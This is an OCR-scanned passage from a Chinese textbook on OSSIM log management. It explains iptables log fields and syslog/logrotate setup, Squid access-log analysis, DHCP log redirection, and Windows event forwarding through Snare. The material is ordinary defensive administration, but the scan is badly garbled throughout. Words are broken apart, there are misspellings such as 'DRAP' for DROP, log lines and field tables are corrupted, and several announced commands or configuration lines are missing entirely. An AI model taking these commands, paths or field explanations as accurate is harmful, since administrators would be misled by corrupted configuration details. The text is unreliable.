» ALIENVAULT INCIDENT RESPONSE: ACCESS / CONNECTION OPENED [TAXONOMY] 


n Opened. 


RAW LOG 


图 7-39. vsftpd 插件 启用 效果 
Raw Log 日 志 会 记录 到 /var/ossec/logs/alerts/2014/apr 目录 下 ， 例 如 : 


/var/ossec/logs/alerts/2014/apr/ossec-alerts-26.10g 


每 天 产生 一 个 文件 ， 多 次 链接 分 条 目 ， 记 录 在 一 个 文件 中 。 


iptables 日 志 分 析 


7.14.1 iptables 日 志 分 析 
防火 墙 除了 能 进行 有 效 控制 网 络 访问 之 外 ,还 有 一 个 很 重要 的 功能 就 是 能 清晰 地 记录 网 络 
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上 的 访问 ， 并 自动 生成 日 志 进 行 保存 。 无 论 是 后 面 我 们 谈 到 的 PIX. ASA 或 是 CheckPoint 防 
火 墙 ， 它 们 产生 的 日 志 内 容 均 类 似 。 任 何 连 接 或 者 请 求 ， 例 如 TCP, UDP, ICMP 连接 记录 、 
连接 的 流量 信息 、 连 接 建 立时 间 等 ， 防 火 墙 日 志 都 会 将 其 逐一 体现 。 所 以 归纳 起 来 ， 防 火 墙 日 
志 大 致 包含 消息 发 送 源 IP 地 址 、 消 息 目 的 IP、 消 息 流 向 、 消 息 的 内 容 ， 以 及 应 用 几 方 面 。 

防火 墙 每 天 要 产生 大 量 的 日 志文 件 ,防火 墙 管理 员 针 对 这 未 经 任何 处 理 和 分 析 的 庞大 的 日 
志 进 行 管理 是 很 困难 的 。 因 此 , 日 志 的 统计 和 分 析 现 在 已 经 成 为 防火 墙 功能 中 必 不 可 少 的 一 项 ， 
管理 员 不 但 可 以 按照 不 同 的 需求 来 查找 日 志 、 审计 日 志 , 还 可 以 分 析 网 络 带宽 的 利用 率 、 各 种 
网 络 协议 和 端口 的 使 用 情况 等 防火 墙 日 志 还 会 产生 安全 警告 以 及 一 些 对 网 络 安全 管理 很 有 帮 
助 的 信息 。 这 极 大 地 方便 了 管理 员 对 防火 墙 的 安全 管控 。 

本 节 以 Linux 下 的 iptables 为 例 讲解 防火 墙 日 志 。 下 面 是 一 段 通过 “-j LOG” 方 式 获取 的 
iptables 一 行 日 志 内 容 : 

Jun 19 17: 20:04 webkernel: NEW DRAP 
IN-eth0OUT-MAC-00:10:4b:cd:7b:b4:00:e0:1e:b9:04; al:08:00 SRC=192.168.150.1 


DST=192.168.150.152 LEN=20 TOS=0X00 PREC=0x00 TTL=249 ID=10492 DF PROTO=UDP SPT=53 
DPT=32926 LEN=231 


对 于 此 日 志 解 释 见 表 7-6 所 示 。 
3& 7-6 Iptables Log 字段 解释 


序号 字段 名 称 含义 

1 Jun 19 17:20:24 

2 Web 

3 Kernel 进程 名 由 syslogd 生成 kernel 为 内 核 产生 的 日 志 说 明 netfilter 
在 内 核 中 运行 

4 NEW DRAP 

5 IN-ethü 数据 包 进入 的 接口 ， 若 为 空 表示 本 机 产生 ， 接 口 还 有 eth0、 
br0 等 

6 OUT- 数据 包 离开 的 接口 ， 若 为 空 表示 本 机 接收 

7 MAC-00:10:4b:cd:7b:b4:00:e0:1 | 00:10:4b:cd:7b:b4 为 目标 MAC 地 址 

e:b9:04:al 00:e0:le:b9:04:al 为 源 MAC 地 址 

8 08:00 08:00 为 上 层 协 议 代码 ， 即 表示 IP 协议 

9 SRC-192.168.150.1 192.168.150.1 为 源 IP 地 址 

10 DST-192.168.150.152 192.168.150.152 为 目标 IP 地 址 

11 LEN=20 IP 封包 + 承载 数据 的 总 长 度 (MTU) 

12 TOS=0x00 IP 包头 内 的 服务 类 型 字段 ， 能 反映 服务 质量 包括 延迟 、 可 靠 
性 和 拥塞 等 

13 PREC-0x00 服务 类 型 的 优先 级 字段 

14 TIL=249 耳 数 据 包 的 生存 时 间 

15 ID=10492 IP 数据 包 标识 

16 DF DF 表示 不 分 段 ， 此 字段 还 可 能 为 MF/FRAG 
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( 续 表 ) 

序号 字段 名 称 

17 PROTO-UDP 传输 层 协 议 类 型 ， 它 代表 上 层 协议 是 什么 ， 可 分 为 TCP, 
UDP、ICMP 等 

18 SPT-53 表示 源 端 口号 

19 DPT-32926 表示 目的 端口 号 

20 LEN=231 传输 层 协议 头 长 度 

21 SEQ= KWA TCP 序列 号 

22 | ACK= 内 容 略 

2 WINDOWS= 内 容 略 

24 RES 

T/SYN/FIN 

26 URGP- 

27 OPT (内 容 咯 ) 

28 INCOMPLETE[65535 bytes 

METER- 

30 | SPI-0xF1234567 
几 种 

32 O 中 括号 出 现在 两 个 地 方 ， 在 ICMP 协议 中 作为 协议 头 递 归 使 
用 ; 在 数据 包 长 度 出 现 非法 时 用 于 指出 数据 实际 长 度 


Er TOS 的 功能 是 对 不 同类 型 的 应 用 协议 数据 包 打 标记 ， 这 样 一 来 当 路 由 器 看 到 带 有 这 些 标 
(0 ， 记 的 数据 包 后 ， 即 可 通过 策略 路 由 将 不 同 的 应 用 协议 流量 转发 到 不 同 的 出 口 链 路 。 当 然 路 
由 器 设备 必须 支持 TOS 机 制 才 行 。 


7.14.2 iptables 日 志 管理 范例 

本 节 介绍 的 内 容 主要 是 系统 单独 生成 iptables 的 独立 日 志 , 并 且 按 每 天 记录 , 生成 iptables 
滚动 日 志 。 

(1) 配置 syslogd 的 配置 文件 /etc/syslog.conf 


在 文件 syslog.conf 里 添加 如 下 内 容 : 


# iptables 日 志 
kern.warn /var/log/iptables 


(2) 使 用 iptables 滚动 日 志 
先 查看 并 确定 logrotate 的 配置 文件 /etc/logrotate.conf， 内 容 如 下 : 
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然后 ， 在 syslog 的 滚动 日 志 配 置 文件 /etcllogrotate.d/syslog 中 ， 添 加 iptables 的 日 志文 件 
/var/log/iptables， 详 细 内 容 如 下 : 


最 后 安排 logrotate 每 天 执行 一 次 ， 确 定 文件 /etc/cron.daily/logrotate 内 容 如 下 : 


7.14.3 $H iptables 日 志 到 指定 文件 

本 小 节 讲 解 对 iptables 进行 配置 ,生成 的 iptables 日 志 可 以 由 syslogd 记录 和 管理 。iptables 
日 志 初 始 存 放 在 /var/log/messages 里 面 , 但 是 由 于 混在 messages 中 ， 可 我 们 只 需要 其 中 的 一 部 
分 ， 这 对 于 管理 产生 了 不 便 ， 一 些 情况 下 可 能 需要 修改 日 志 输出 的 位 置 。 

iptables 有 三 种 log 记录 形式 ， 分 别 是 log. ulog, nflog. log 用 于 将 匹配 的 数据 包 记 录 到 
系统 的 syslog 中 去 ， 用 户 也 可 以 直接 通过 dmesg 命令 查看 。log 命令 只 记录 包头 的 一 些 。ulog 
通过 netlink 套 接 字 将 数据 包 多 播 到 指定 netlink 多 播 组 ， 这 样 任何 感 兴趣 的 进程 都 可 以 通过 建 
立 netlink 套 接 字 来 接受 内 核 中 的 数据 包 信息 。ulog 可 以 将 整个 数据 包 复 制 并 发 送 给 应 用 程序 ， 
当然 也 可 以 指定 发 送 方 数据 包 的 字 节 数 。nflog 类 似 于 ulog 但 功能 更 加 强大 , 本 节 不 讨论 nflog 
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的 使 用 。 
下 面向 大 家 介绍 如 何 建立 一 个 新 的 日 志文 件 /var/log/iptables.log。 通 过 修改 或 使 用 新 的 日 
志文 件 ， 可 以 创建 更 好 的 统计 信息 或 者 帮助 我 们 分 析 网 络 攻 击 信息 。 
(1) iptables 默认 的 日 志文 件 
例如 ， 如 果 输 入 下 面 的 命令 ， 屏 幕 将 显示 /varlog/messages 文件 中 的 iptables 日 志 信 息 : 
(o tail -f /var/log/messages |. 


输出 为 : 


(2) 将 iptables 日 志 转发 到 指定 文件 


在 /var/log/ 手 动 创建 iptables.log 文件 ， 然 后 打开 /etc/syslog.conf 文件 或 者 /etc/rsyslog.conf， 
这 里 以 前 者 为 例 。 


在 文件 末尾 加 入 下 面 一 行 信息 : 


然后 保存 退出 ， 并 重新 启动 syslog 服务 。 
接着 ， 设 置 iptables 使 用 log-level 4 参数 〈 前 面 有 一 个 log-prefix 标志 )， 例 如 : 


接着 查看 iptables 规则 匹配 : 


举例 ， 丢 弃 和 记录 所 有 来 自 IP 地 址 65.55.11.22 的 连接 信息 到 /var/log/iptables.log 文件 。 


这 个 例子 使 用 的 命令 解释 如 下 : 
€  log-evel4: 记录 的 级 别 ， 由 表 7-2 可 知 级 别 4 为 警告 (warning) . 
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€ log-prefix ‘*** TEXT t^. : 这 里 定义 了 在 日 志 输出 信息 前 加 上 TEXT 前 组 (也 可 
输入 其 他 内 容 ) 。TEXT 信息 可 超 16 个 字符 ， 这 样 就 可 以 在 记录 文件 中 方便 找到 相 
关 的 信息 。 

现在 可 以 通过 /var/log/iptables.log 文件 查看 iptables 的 所 有 信息 : 

# tail -f /var/log/iptables.log 
Jan 2 11:15:35 Chowroc kernel: FORWARD o ppp0: IN-eth0 OUT=ppp0 SRC-192.168.1.4 


DST-23.15.62.82 LEN-64 TOS-0x10 PREC-0x00 TTL-63 ID-26229 DF PROTO-TCP SPT-1027 
DPT-80 WINDOW-5840 RES-0x00 ACK URGP=0 


如 果 需 要 将 客户 机 上 iptables 转发 到 OSSIM 服务 器 ， 只 需要 在 syslog.conf 中 加 入 : 


kern.warn QOssim Sensor IP 


| 这 里 facility 的 [kem] 和 priority 的 [warn]， 第 一 节 已 经 讲 过 。 为 什么 不 用 *.* @IP 呢 ? 你 必 
| 须 清楚 要 收集 特定 的 重要 日 志 还 是 收集 所 有 日 志 , 很 多 用 户 漫 无 目的 地 收集 日 志 , 这 样 只 
| 会 对 后 续 的 日 志 分 析 系 统 造成 负担 。 


保存 退出 ， 然 后 重启 Syslog 服务 ,默认 OSSIM 启用 防火 墙 , 需要 添加 如 下 规则 ， 日 志 ; 
能 够 发 送 成 功 : 
VirtualUSMAllIn0ne:/etc/iptables£ cat rules012-custom.iptables 
-A INPUT -p tcp -m state —state NEW -m tcp —dport 514 -j ACCEPT 


-A INPUT -j REJECT —reject-with icmp-host-prohibited 
-A FORWARD -j REJECT —reject-with icmp-host-prohibited 


为 了 将 它 的 输出 存放 到 指定 的 文件 ， 还 有 一 种 方法 就 是 使 用 ULOG 扩展 目标 。iptables 的 
ULOG 扩展 目标 用 netlink 多 播 组 (multicast group). 向 用 户 空间 发 送 捕捉 到 的 消息 。 在 Debian 
系统 中 安装 ULOG 很 容易 ， 输 入 以 下 指令 : 

#apt-get install ulogd 


安装 成 功 后 ， 接 着 配置 ULOG， 在 Debian 系统 中 ， 配 置 文件 位 于 /etc/ulogd.conf 中 ， 接 着 
我 们 将 多 播 组 组 号 改 成 32， 位 于 该 配置 文件 11 行 位 置 。 
将 "nlgroup=1" 改 成 "nlgroup=32" 


接着 ， 开 始 一 试 身手 吧 ，ULOG 目标 在 iptables 中 的 典型 用 法 如 下 : 


#iptables -I OUTPUT -d 192.168.11.1 -j ULOG --ulog-nlgroup 1 --ulog-prefix 
"TEXT:" --ulog-cprange 100 --ulog-qthreshold 10 


€ 参数 “--ulog-nlgroup 32”， 这 是 一 个 多 播 组 组 号 ， 其 含义 代表 使 用 编号 是 32 的 消息 
池 广 播 消息 。 这 个 号 一 定 要 和 ulogd.conf 中 指定 的 号 相对 应 ， 才 能 收 到 消息 。 

€ 参数 “--ulog-prefix”， 使 用 方法 和 LOG 的 prefix 一 样 ， 只 是 长 度 可 以 达到 32 个 字符 。 

€ 参数 “--ulog-cprange 100”， 指 定 每 个 包 要 向 “ULOG 在 用 户 空间 的 代理 ”发 送 的 字 
节 数 ， 表 示 把 整个 包 的 前 100 个 字 节 复 制 到 用 户 空间 记录 下 来 ， 其 中 包含 了 这 个 包 
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头 ， 还 有 一 些 包 的 引导 数据 。 默认 值 是 0， 表示 复制 整个 包 ， 不 管 它 有 多 大 。 
€ 参数“--ulog-qthreshold 10”， 表 示 先 在 内 核 里 积聚 10 个 包 ， We 空 
间 里 ， 它 们 会 被 看 作 同 一 个 netlink 的 信息 ， 目 的 是 告诉 ULOG 在 向 用 户 空间 发 送 数 
据 以 供 记录 之 前 ， 要 在 内 核 里 收集 的 包 的 数量 。 
这 几 个 参数 不 是 必须 填 入 ， 用 户 可 根据 需要 选择 ， 由 ULOG 记录 的 日 志 位 置 在 
/var/log/ulog/syslogemu.log 文件 中 。 
然后 ， 在 Alienvault Center 中 的 插件 管理 中 ,加 入 iptables 插件 对 日 志 进行 归 一 化 处 理 后 ， 
再 提供 给 用 户 在 SIEM 控制 台 上 浏览 。 


Squid 服务 日 志 分 析 


Apache 和 Squid 是 两 种 著名 的 代理 缓存 软件 ， 但 Squid 较 Apache 而 言 是 专门 的 代理 
缓存 服务 器 软件 ， 其 代理 缓存 的 功能 强大 ， 支 持 HTTP/1.1 协议 ， 其 缓存 对 象 也 较 多 ， 并 且 
的 缓存 管理 模块 和 访问 控制 模块 功能 很 强大 。 所 以 在 分 析 完 Apache 日 志 后 , 再 看 Squid 

志 就 容易 多 了 。 最 后 ,通过 日 志 不 但 能 分 析 Squid 的 基本 的 运行 状态 ， 还 能 在 计算 机 取证 中 
ee 


7.15.1 Squid 日 志 分 类 

Squid 的 日 志 系统 相对 比较 完善 ， 其 主要 日 志 分 为 两 个 ，access.log 和 cache.log。 它 们 的 
作用 如 下 : 

€ access.log: 客户 端 使 用 代理 服务 器 的 记录 文件 ， 访 问 日 志 位 置 在 squid.conf 中 修改 。 

€ cachelog: 缓存 在 运行 时 的 状态 信息 和 调试 信息 ， 一 般 情况 下 容量 不 大 。 缓 存 日 志 位 

置 在 squid.conf 中 修改 。 

当代 理 服务 器 运行 时 ， 所 有 客户 提出 的 请 求 ， 以 及 Squid 处 理 的 结果 都 会 被 记录 在 
/var/log/squid/access.log 文件 里 ， 使 得 access.log 文件 的 增长 速度 很 快 ， 通 常会 挂 载 一 个 较 大 的 
磁盘 作为 存储 空间 。 


7.15.2 ”典型 Squid 访问 日 志 分 析 
下 面 给 出 一 条 典型 的 Squid 访问 日 志 : 
1356692954. 01421192. 168. 150. 152 ENSENN- GET 


$1 $2 $3 $5 $6. 
http://www. redhat. com/ favicon. php Boc E | 
$7 $8 $9 $10. 
对 这 条 日 志 的 分 析 见 表 7-7。 
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表 7-7 Squid 日 志 格 式 


时 间 截 (记录 了 访问 时 间 》 
持续 时 间 
IP 地 址 
结果 /状态 码 ， 正 斜 杠 前 表示 Squid 的 结果 码 ， 后 面 表示 状态 码 
传输 容量 指 传 给 客户 端的 字 节 数 

请 求 方式 
URL 
客户 端的 IDENT 查询 一 般 为 关闭 


域 值 
32 21 
TCP MISS/200 


代码 等 级 
HTTP 请 求 关 部 


结果 码 TCP_MISS 表示 没有 命中 缓存 ，TCP_HIT 表示 命中 。 
下 面 通过 一 个 非常 实用 的 Shell 命令 获取 比较 详细 的 命中 情况 : 
# cat access.loglawk '(print $4)'|sort|uniq -c|sort -nr 
33 TCP MISS/200 

2 TCP MISS/302 

2 TCP MEM HIT/302 

1 TCP MISS/503 


当然 状态 信息 CTCP. MISS, TCP. MEM 等 ) 不 止 这 几 个 。 总 的 来 说 ，HIT 表示 命中 ， 而 
TCP_MISS 表示 未 命中 。 
下 列 标签 可 能 出 现在 access.log 文件 的 第 四 个 域 。 
TCP HIT: Squid 发 现 请 求 资源 最 新 的 复制 ， 并 立即 发 送 到 客户 端 。 
TCP_MISS: Squid 没有 请 求 资源 的 cache 复制 。 
TCP REFERSH HIT: Squid 发 现 请 求 资源 旧 复 制 ， 并 发 送 确认 请 求 到 原始 服务 器 。 
TCP IMS HIT: 客户 端 发 送 确认 请 求 ，Squid 发 送 更 新 的 内 容 到 客户 端 ， 而 不 联系 原 
始 服务 器 。 
€ TCP NEGATIVE HIT: 在 对 原始 服务 器 的 请 求 导 致 HTTP 错误 时 ，Squid 会 缓存 这 
个 响应 。 在 短 时 间 内 对 这 些 资 源 的 重复 请 求 ， 导 致 了 是 否 命中 。negative_ttl 指令 控 
制 这 些 错误 被 cache 的 时 间 数 量 。 
€ TCP MEM HIT: Squid 在 内 存 cache 里 发 现 请 求 资源 的 有 效 复 制 ， 并 将 其 立即 发 送 
到 客户 端 。 
€ TCP DENIED: 因为 http access 3 http reply access 规则 ， 客户 端的 请 求 被 拒绝 了 。 
€ TCP REDIRECT: 重 定向 程序 告诉 Squid 产生 一 个 HTTP 重 定向 到 新 的 URI。 正 常 
情况 下 ，Squid 不 会 记录 这 些 重 定向 。 


7.15.3 Squid 时 间 戳 转换 


COD 在 表 7-7 所 示 的 例子 中 ，Squid 默认 时 间 惟 (1356693954.014) 并 不 直观 ， 下 面 通过 
脚本 将 时 间 戳 换算 成 我 们 能 识别 的 时 间 格 式 : 
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如 下 所 示 ， 经 过 perl 变化 后 的 时 间 非 常 直 观 地 显示 出 来 ， 便 于 查看 。 


Fri Dec 28 22:05:30 2012 118 192.168.150.148 TCP MISS/200 3705 GET http://safebrowsing: 
cache. google. CON ERTOETONE IDE EG EER EE 'oaXNoLXNoYXZhchAAGNPiDyDM4gSyBkPxAwD Aw 一 DIRECT/T4. 125.31.102 


'ebrowsing 
Fri Dec 28 22:05:30 2012 T4 192.168.150.148 TCP MISS/200 1133 GET http://safebrowsing-d 

cache. google. com/safebrows: Spe /rar '29nLXBoaXNoLXNoYXZhchAAGM3iDyDg4gSqPlDxAwD  wEyBUS3xAwAH — 

DIRECT/T4. 125. 31. 102 De iti on/vnd. google. safebrowsing 

Fri Dec C died 012 _ 495 De 168. 150. 148 TCP. MEN HIT/302 846 GET http://en-us. fxfeeds. mozilla. com/en 


xt/html 
Fri Dec 28 22:05: 49. 2012 - 32 192. -168. 150.148 Ter IER RIT/302 890 GET 
http: //fxfeeds. nozilla.com/firefox/headlines. xml — NONE/- text/html 
Fri Dec 28 22:06:53 2012 63859 192.168.150.148 TCP-NISS/503. 1566 GET 
http://newsrss. bbc. co. uk/rss/newsonline world edition/front page/rss. xml - DIRECT/59.24.3.173 text/html 


(2) 将 Squid 输出 日 志 格式 变形 的 脚本 。 


有 时 需要 动态 显示 squid 日 志 的 第 3、8、7 列 内 容 ， 以 便 更 符合 我 们 日 常 浏览 习惯 ,就 可 
以 使 用 如 下 命令 : 


G) 可 以 将 一 个 squid 日 志 记录 行 分 割 成 多 个 字段 ， 使 用 参数 传 回 需要 的 字段 。 
| # tail -f /ver/log/squid/access.log | awk "(print$3 " " $B 3 
这 里 选择 的 是 客户 IP 及 取 回 内 容 字段 ， 显 示 如 下 : 


Squid 日 志 轮 循 方法 可 参考 Apache 中 处 理 轮 询 方 法 。 


7.15.4 将 Squid 的 日 志 收 集 到 OSSIM 
将 Squid 的 日 志 收 集 到 OSSIM 步骤 如 下 : 
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(1) 首先 将 Squid 插件 加 载 到 “detector” 中 ， 我 们 还 要 修改 /etc/ossim/ossim_setup.conf 
配置 文件 。 
举例 : 


[sensor] 
detectors-snare, p0f, osiris, arpwatch, snortunified, pads, 
ssh, pam unix, rrd, sudo, iptables, nagios, squid 


(2) 修改 squid 插件 内 容 。 


编辑 /etc/ossim/agent/plugins/squid.cfg 插件 配置 文件 , 将 原 有 配置 按照 下 面 例子 修改 , squid 
的 插件 ID 号 为 1553 。 


create file-true \\* 这 行 配置 代表 如 果 不 存 在 这 个 文件 就 创建 *\\ 

process=squid 

start=yes ; launch plugin process when agent starts 

stop=yes ; shutdown plugin process when agent stops 

startup-/etc/init.d/$(process)s start 

shutdown-/etc/init.d/$(process)s stop 

restart-yes ; restart plugin process after each interval 

restart interval=\ CFG(watchdog,restart interval) ; interval between each 
restart 


G) 重 配置 OSSIM。 


#/usr/bin/ossim-reconfig 


这 时 会 产生 /var/log/squid/access.log 日 志文 件 : 


#tail -f /var/log/squid/access.log 

Aug 12 17:26:00 ossim squid[11680]: 1282814160.311 1291 192.168.150.219 
TCP MISS/200 405 POST 
http://164.24.134.107/gateway/gateway.dll?Action-poll&SessionID-989804211.9675 
03471 - DIRECT/164.24.134.107 application/x-msn-messenger 

Aug 12 17:26:20 ossim squid[11680]: 1282814180.328 1299 192.168.150.219 
TCP MISS/200 404 POST 
http://164.24.134.107/gateway/gateway.dll?Action-poll&SessionID-989804211.1408 
535067 - DIRECT/164.24.134.107 application/x-msn-messenger 


DHCP 服务 器 日 志 


DHCP (Dynamic Host Configuration Protocol， 动 态 主机 配置 协议 ) 是 一 种 有 效 的 卫 地 址 
分 配 手 段 ， 现 已 经 被 广泛 地 应 用 在 各 种 局 域 网 管理 中 。 它 能 动态 地 向 网 络 中 的 每 台 计 算 机 分 配 
唯一 的 IP 地 址 ， 并 提供 安 人 全、 可靠、 简单 和 统一 的 TCP/IP 网 络 配置 ， 确 保 不 发 生 IP 地 址 冲 
突 。 当 在 服务 器 上 启用 DHO 后 ， 我 们 希望 了 解 服务 的 运行 情况 ， 希 望 看 到 详细 日 志 。 可 以 
通过 下 面 的 命令 了 解 到 dhep server 的 日 志文 件 在 什么 地 方 。 以 RHELS 系统 为 例 ， 命 令 如 下 : 
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#rpm -ql dhcp-server 


DHCP 服务 的 默认 日 志 不 会 输出 到 指定 文件 ， 而 是 和 NFS 服务 一 样 ， 输 出 到 
/varlog/messages 文件 中 ， 成 了 日 志 的 “大 杂烩 ?， 既 不 方便 识别 ， 也 不 便于 查找 故障 ， 一 旦 
messages 文件 遭 到 破坏 ，DHCP 的 日 志 也 跟着 受 影 响 。 


Dec 31 16:32:51 localhost dhcpcd[5562]: br0: trying to use old lesse in '/var/lib/dhcpcd/dhcpcd-br0, info" 

Dec :32:51 localhost dhcpcd[5562]: br0: lease expired 4041 seconds ago 

Dec localhost dhcpcd[5562]: br0: broadcasting for a lease 

Dec localhost dhcpd: DHCPDISCOVER from 00:0c:29:51:b3:d9 (linux-5jlv) via br0 

Dec localhost dhcpd: DHCPOFFER on 192.168.150.201 to 00:0c:29:51:b3:d9 (linux-5jlv) via br0 

Dec localhost dhcpd: DHCPDISCOVER from 00:0c:29:51:b3:d9 (linux-5jlv) via br0 

Dec localhost dhcpd: DHCPOFFER on 192.168.150.201 to 00:0. 3:d9 (linux-5jlv) via br0 

Dec localhost dhcpd: DHCPDISCOVER from 00:0c:29:51:b3:d9 (linux-5jlv) via br0 

Dec localhost dhcpd: DHCPOFFER on 192.168.150.201 to 00:0c:29:51:b3:d9 (linux-53lv) via brO 

Dec localhost : DHCPDISCOVER from 00:0c:29:51:b3:d9 (linux-5jlv) via br0 

Dec localhost .150.201 to 00 :b3:d9 (linux-5jlv) via br0 
localhost : : 


localhost 
localhost 


:d9 (linux-5jlv) via br0 


Dec localhost : jlv) via br0 

Dec localhost dhcpd: DHCPOFFER on 192. 168. 15i 0. 201 to 00:0c:29:51:b3:d9 (linux-5jlv) via br0 
Dec localhost dhcpcd[5562]: br0: timed out 

Dec localhost dhcpcd[5562]: br0: trying to use old lease in ' /var/lib/dhcpcd/dhcpcd-br0. info" 


localhost dhcpcd[5562]: br0: lease expired 4061 seconds ago 


对 于 以 上 日 志 , 我 们 可 以 把 在 前 几 节 学 到 的 脚本 放 到 这 里 进行 分 析 。 还 有 没有 其 他 文件 ， 
记录 了 DHCP 的 分 配 IP 的 信息 呢 ? 还 有 一 个 是 /varlib/dhcp/db/dhcpd.leases 文件 ， 它 记录 了 客 
户 机 分 配 IP 的 详细 信息 。 下 面 我 们 通过 一 个 例子 进行 解读 。 

客户 机 每 次 获取 地 址 后 会 产生 如 下 信息 : 

Lease 192.168.150.207 { 

Starte 1 2012/12/31 12:23:32 

End 1 2012/12/31 11:25:32; 

FTStP 1 2012712731 11:25:32) 

Cite 12012/122/311 117257327 

Binding state free; 

Hardware ethernet 00:0c:29:51:b3:d9; 
Uid "N001N000N014) QV263N331"; 
Client-hostname "linux-5jlv"; 

} 


每 当 发 生 租约 变化 的 时 候 ,都 会 在 文件 结尾 添加 新 的 租约 记录 ， 也 就 是 说 这 个 文件 是 在 不 
断 变化 的 。 表 7-8 做 出 解释 。 


表 7-8 DHCP 日 志 含义 


结束 时 间 
指定 租约 过 期 时 间 
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( 续 表 ) 
客户 端 续 约 时 间 
g 租约 绑 定 状态 自由 (free) 、 激 活 (active) 
Hardware ethemet 客户 机 网 卡 MAC 地 址 
| ump 客户 端 标识 符 由 三 位 八进制 表示 用 于 与 MAC 匹配 | 
[ER 客户 机 名 称 | 


从 上 面 分 析 看 到 ，DHCP 服务 器 的 日 志 在 messages 和 dhepd.leases 里 分 别 有 一 部 分 ， 都 不 
全 面 ， 如 何 将 DHCP 的 日 志 专门 转 储 到 特定 文件 中 呢 ? 下 面 介 绍 一 种 方法 。 

假设 需要 将 日 志 记录 在 /varlog/ 目 录 下 ， 我 们 先 新 建 一 个 dhcp.log 文件 。 

(1) 创建 dhcp.log 文件 : 


#touch /var/log/dhcp.log 
#chmod 640 /var/log/dhcp.log 


(2) 修改 /etc/dhcpd.conf 配置 文件 ， 然 后 保存 并 退出 〈 注 意 不 同 Linux 发 行 版 配置 文件 路 
径 有 所 不 同 ): 

log-facility local4; 

(3) fEletc/rsyslog.conf 文件 中 添加 : 

Local4.* /var/log/dhcp.log 

注意 要 把 下 面 这 行 语句 注销 : 

Local4,local5.* -var/log/localmessages;RSYSLOG TraditionalFileFormat 

重启 DHCP 服务 即 可 生效 ， 这 时 的 日 志文 件 就 是 DHCP 服务 器 出 现 故 障 后 ， 排 除 错 误 的 

-个 重要 基础 数据 。 所 以 ， 我 们 还 需要 定期 对 这 个 日 志文 件 做 好 备份 工作 。 和 否则， 如 果 这 个 日 

志 意 外 丢失 ， 我 们 就 很 难 查 清 DHCP 服务 器 的 故障 。 


收集 Windows 日 志 


OSSIM 是 目前 为 数 不 多 的 几 个 开源 的 SIEM/ 安 全 管理 平台 之 一 ， 而 目前 还 没有 什么 集成 
化 的 日 志 管理 分 析 〈 称 日 志 管 理 系统 ， 简 称 LM) 系统 ，OSSIM 是 比较 好 用 的 一 种 LM， 还 有 
Sawmill 和 Splunk 都 有 针对 UNIX/Linux 的 版 本 。 Agent 这 个 概念 在 OSSIM 日 志 收 集 系 统 中 非 
常 重要 ， 因 为 在 系统 的 日 志 收 集 过 程 中 , 它 非常 适合 大 型 网 络 中 的 分 布 式 日 志 收集 工作 。 分 布 
式 日 志 收 集 架构 如 图 7-40 所 示 。 
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二 


EREI 


æ a .。 


图 7-40 分布 式 日 志 收集 架构 
从 上 图 中 我 们 知道 ， 安 装 在 终端 上 的 常用 代理 既 包 括 syslog， 还 包括 Snare《〈 系 统 入 侵 分 
析 和 报告 环境 )，Snare 是 一 款 开源 软件 。Snare 逻辑 上 由 内 核 动态 加 载 模块 、 用 户 空间 审核 程 
序 以 及 Web 分 析 前 端 三 部 分 组 成 。 通 过 图 形 化 的 日 志 分 析 前 端 便 可 使 用 户 得 到 可 自 定义 的 、 
规范 的 系统 日 志和 事件 报告 。 


7.17.1 OSSIM 日 志 处 理 流程 

首先 设备 把 日 志 信息 以 Syslog 的 形式 发 给 Agent， 日 志 存 储 在 /var/log/ F, WR Snort, 
则 日 志 位 置 为 /var/log/snort.log。Agent 程序 则 会 调用 /etc/ossim/agent/plugins 下 面 对 应 的 Snort 
插件 来 /var/log/snort.log 下 面 取 对 应 的 日 志 ， 然 后 根据 插件 里 面 写 的 正则 表达 式 来 提取 日 志 的 
关键 字段 发 给 Server 端 ， 最 后 由 Server 再 将 日 志 分 析 之 后 在 OSSIM 上 面 呈现 出 来 。 


7.17.2 ”通过 Snare 转发 Windows 日 志 


Windows 日 志 可 记录 应 用 程序 、 安 全 和 系统 事件 ， 具 备 一 定 的 安全 性 ， 它 采用 二 进 制 方 
式 记 录 ， 格 式 较 复杂 ， 不 易 直 接 查 看 ，Snare for Windows 可 以 把 Windows 系统 事件 日 志 实 时 
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转发 到 SYSLOG 服务 器 上 ， 它 可 用 于 发 现 和 检测 Windows 系统 异常 ， 它 支持 的 日 志 类 型 有 安 
全 日 志 、 应 用 日 志 、 系 统 日 志 ， 以 及 活动 目录 (Active Directory) 日 志 等 。 下 载 安装 Snare for 
Windows 的 位 置 ( 需 要 下 载 代理 ， 很 显然 它 是 基于 Windows 的 代理 程序 ) 在 OSSIM 4.3 系统 
左 侧 菜单 中 ， 依 次 单 击 Deployment2 Collection Downloads, 7E OSSIM 4.8 之 后 的 版 本 ， 下 载 
位 置 在 Web UI 的 右上 角 “SUPPORT” 按 钮 处 。 在 Windows 下 安装 此 程序 非常 简单 ， 安 装 过 程 
中 只 要 使 用 系统 账户 安装 即 可 。 安 装 完毕 ， 可 以 在 开始 菜单 中 看 到 以 下 三 个 菜单 栏 : 

€ Disable Remote Access to Snare for Windows: 关闭 Snare 的 远程 管理 ; 

€ Restore Remote Access to Snare for Windows: 恢复 Snare 的 远程 管理 ; 


€ Snare for Windows: 程序 配置 界面 ， 如 图 7-41 所 示 。 


Latest Events SNARE Network Configuration 


Network Configuration 


Remote Control The following network configuration parameters of the SNARE unit is set to the following values: 


Configuration 


Tr Overide detected DNS Name with: 
MT TT Destination Snare Server address 


Apply the Latest Audit Destination Port 


Configuration 
Perform a scan of ALL objectives, and display 


the maximum criticality? 


Domain Allow SNARE to automatically set audit 
configuration? 


Allow SNARE to automatically set file audit 
configuration? 


Export Snare Log data to a file? 


Enable active USB auditing? 

(This option requires the service to be fully 
restarted) 

Enable SYSLOG Header? 


SYSLOG Facility 
SYSLOG Priority 


[Change Configuration ) [Reset Form | 


7-41 Snare 管理 配置 


初次 装 完 Snare for windows 代理 之 后 ， 首 先 在 Windows 系统 中 ， 选 择 程序 一 InterSect 
Alliance， 再 选择 Restore Remote Access to Snare for Windows， 然 后 即 可 通过 Snare for 
Windows， 打 开 一 个 Web UI 界面 ， 进 入 后 发 现 ，Destination Snare Server address 7j 127.0.0.1, 
将 它 改 为 OSSIM 服务 器 地 址 192.168.150.20 而 Destination Port 初始 值 为 6161, 将 它 改 为 514 


同时 选择 以 下 复 选 框 : 


€ Perform a scan of ALL objectives, and display the maximum criticality?( 执行 所 有 目标 的 
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(Use alternate header? 


User 


Notice 
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扫描 ， 并 显示 最 关键 日 志 ) 

